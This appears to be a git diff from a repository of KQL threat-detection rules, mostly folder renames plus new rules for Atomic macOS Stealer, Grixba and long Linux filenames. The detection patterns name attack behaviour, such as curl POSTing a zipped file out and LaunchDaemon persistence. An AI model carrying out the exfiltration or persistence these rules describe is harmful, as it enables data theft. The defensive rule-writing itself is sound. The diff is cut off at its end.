similarity index 100% rename from KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql rename to KQL/rules-emerging-threats/2024/Malware/DarkGate/darkgate_drop_darkgate_loader_in_c_temp_directory.kql diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql rename to KQL/rules-emerging-threats/2024/Malware/Generic/file_creation_related_to_rat_clients.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_kamikakabot_activity_lure_document_execution.kql rename to KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_lure_document_execution.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql rename to KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql rename to KQL/rules-emerging-threats/2024/Malware/KamiKakaBot/potential_kamikakabot_activity_winlogon_shell_persistence.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql b/KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql rename to KQL/rules-emerging-threats/2024/Malware/Lummac-Stealer/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_raspberry_robin_cpl_execution_activity.kql rename to KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_cpl_execution_activity.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql b/KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql rename to KQL/rules-emerging-threats/2024/Malware/Raspberry-Robin/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_autorun_persistence.kql diff --git a/KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_configuration_persistence.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_execution_via_rundll32_exe.kql diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_loaded_via_rundll32_exe.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql rename to KQL/rules-emerging-threats/2024/Malware/kapeka/kapeka_backdoor_persistence_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql b/KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_kapeka_decrypted_backdoor_indicator.kql rename to KQL/rules-emerging-threats/2024/Malware/kapeka/potential_kapeka_decrypted_backdoor_indicator.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql rename to KQL/rules-emerging-threats/2024/TA/FIN7/potential_apt_fin7_exploitation_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_creation.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_file_creation_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_javascript_constrained_file_creation.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql rename to KQL/rules-emerging-threats/2024/TA/Forest-Blizzard/forest_blizzard_apt_process_creation_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql b/KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/screenconnect_slashandgrab_exploitation_indicators.kql rename to KQL/rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/screenconnect_slashandgrab_exploitation_indicators.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-10035/potential_exploitation_of_goanywhere_mft_vulnerability.kql diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql similarity index 100% rename from KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-24054/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql diff --git a/KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-30406/suspicious_process_spawned_by_centrestack_portal_apppool.kql diff --git a/KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31161/suspicious_crushftp_child_process.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_sap_netweaver_webshell_creation_linux.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-31324/potential_sap_netweaver_webshell_creation_linux.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-32463/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql similarity index 100% rename from KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-33053/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-49144/potential_notepad_cve_2025_49144_exploitation.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-53770/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-54309/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57788/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql diff --git a/KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57790/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-57791/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql rename to KQL/rules-emerging-threats/2025/Exploits/CVE-2025-59287/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql new file mode 100644 index 00000000..6d5f7945 --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_filegrabber_activity.kql @@ -0,0 +1,10 @@ +// Title: Atomic MacOS Stealer - FileGrabber Activity +// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital) +// Date: 2025-11-22 +// Level: high +// Description: Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "POST" and ProcessCommandLine contains "user:" and ProcessCommandLine contains "-H " and ProcessCommandLine contains "BuildID" and ProcessCommandLine contains "file=@/tmp/out.zip" and ProcessCommandLine contains "cl: 0") or (ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql new file mode 100644 index 00000000..51ba564e --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Malware/Atomic-MacOS-Stealer/atomic_macos_stealer_persistence_indicators.kql @@ -0,0 +1,10 @@ +// Title: Atomic MacOS Stealer - Persistence Indicators +// Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital) +// Date: 2025-11-22 +// Level: high +// Description: Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1564.001, attack.t1543.004, detection.emerging-threats + +DeviceFileEvents +| where FolderPath =~ "/Library/LaunchDaemons/com.finder.helper.plist" or (InitiatingProcessFolderPath endswith "/curl" and FolderPath endswith ".helper" and FolderPath startswith "/Users/") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql new file mode 100644 index 00000000..bbdd647f --- /dev/null +++ b/KQL/rules-emerging-threats/2025/Malware/Grixba/grixba_malware_reconnaissance_activity.kql @@ -0,0 +1,13 @@ +// Title: Grixba Malware Reconnaissance Activity +// Author: yxinmiracle, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-26 +// Level: high +// Description: Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations. +// This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing. +// MITRE Tactic: Reconnaissance +// Tags: attack.reconnaissance, attack.t1595.001, attack.discovery, attack.t1046, detection.emerging-threats +// False Positives: +// - Legitimate tools that use similar command-line argument structures (e.g., a tool with '--mode scan' and '--input file.txt') could trigger this rule. However, the specific combinations are indicative of reconnaissance or defense evasion. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-i " or ProcessCommandLine contains "-input " or ProcessCommandLine contains "-i:" or ProcessCommandLine contains "-input:") and (ProcessCommandLine contains ":f " or ProcessCommandLine contains ":r " or ProcessCommandLine contains ":s " or ProcessCommandLine contains " f " or ProcessCommandLine contains " r " or ProcessCommandLine contains " s ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "-mode " or ProcessCommandLine contains "-m:" or ProcessCommandLine contains "-mode:") and (ProcessCommandLine contains "scan " or ProcessCommandLine contains "scanall ") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql rename to KQL/rules-emerging-threats/2025/Malware/Katz-Stealer/katz_stealer_dll_loaded.kql diff --git a/KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql rename to KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_malicious_github_workflow_creation.kql diff --git a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql similarity index 100% rename from KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql rename to KQL/rules-emerging-threats/2025/Malware/Shai-Hulud/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql diff --git a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql rename to KQL/rules-emerging-threats/2025/Malware/funklocker_ransomware_file_creation.kql diff --git a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql rename to KQL/rules-emerging-threats/2025/Malware/kalambur_backdoor_curl_tor_socks_proxy_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql deleted file mode 100644 index 558e1712..00000000 --- a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Title: MacOS FileGrabber Infostealer -// Author: Jason Phang Vern - Onn (Gen Digital) -// Date: 2025-09-12 -// Level: high -// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.002, detection.emerging-threats - -DeviceProcessEvents -| where ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql new file mode 100644 index 00000000..33bcdce3 --- /dev/null +++ b/KQL/rules-threat-hunting/linux/file/file_event/potentially_suspicious_long_filename_pattern_linux.kql @@ -0,0 +1,14 @@ +// Title: Potentially Suspicious Long Filename Pattern - Linux +// Author: @kostastsale +// Date: 2025-11-22 +// Level: low +// Description: Detects the creation of files with unusually long filenames (100 or more characters), which may indicate obfuscation techniques used by malware such as VShell. +// This is a hunting rule to identify potential threats that use long filenames to evade detection. Keep in mind that on a legitimate system, such long filenames can and are common. Run this detection in the context of threat hunting rather than alerting. +// Adjust the threshold of filename length as needed based on your environment. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004, attack.defense-evasion, attack.t1027, detection.threat-hunting +// False Positives: +// - Legitimate files with long filenames. + +DeviceFileEvents +| where FolderPath matches regex "[^/]{100,}$" and (not((FolderPath startswith "/run/systemd/units/invocation:systemd-fsck@" or FolderPath startswith "/sys/firmware/" or FolderPath startswith "/var/log/journal/"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql rename to KQL/rules-threat-hunting/linux/file/file_event/python_path_configuration_file_creation_linux.kql diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql similarity index 100% rename from KQL/rules-threat-hunting/Discovery/process_discovery.kql rename to KQL/rules-threat-hunting/linux/process_creation/process_discovery.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql rename to KQL/rules-threat-hunting/linux/process_creation/terminate_linux_process_via_kill.kql diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql rename to KQL/rules-threat-hunting/macos/file/file_event/python_path_configuration_file_creation_macos.kql diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql similarity index 100% rename from KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql rename to KQL/rules-threat-hunting/macos/process_creation/clipboard_data_collection_via_pbpaste.kql diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_browser_credential_files_by_uncommon_applications.kql diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_reg_hive_files_by_uncommon_applications.kql diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_sysvol_policies_share_by_uncommon_process.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql rename to KQL/rules-threat-hunting/windows/file/file_access/access_to_windows_outlook_mail_files_by_uncommon_applications.kql diff --git a/KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql b/KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql rename to KQL/rules-threat-hunting/windows/file/file_access/unattend_xml_file_access_attempt.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql b/KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql rename to KQL/rules-threat-hunting/windows/file/file_delete/ads_zone_identifier_deleted.kql diff --git a/KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql b/KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql similarity index 100% rename from KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql rename to KQL/rules-threat-hunting/windows/file/file_event/creation_of_an_executable_by_an_executable.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql similarity index 100% rename from 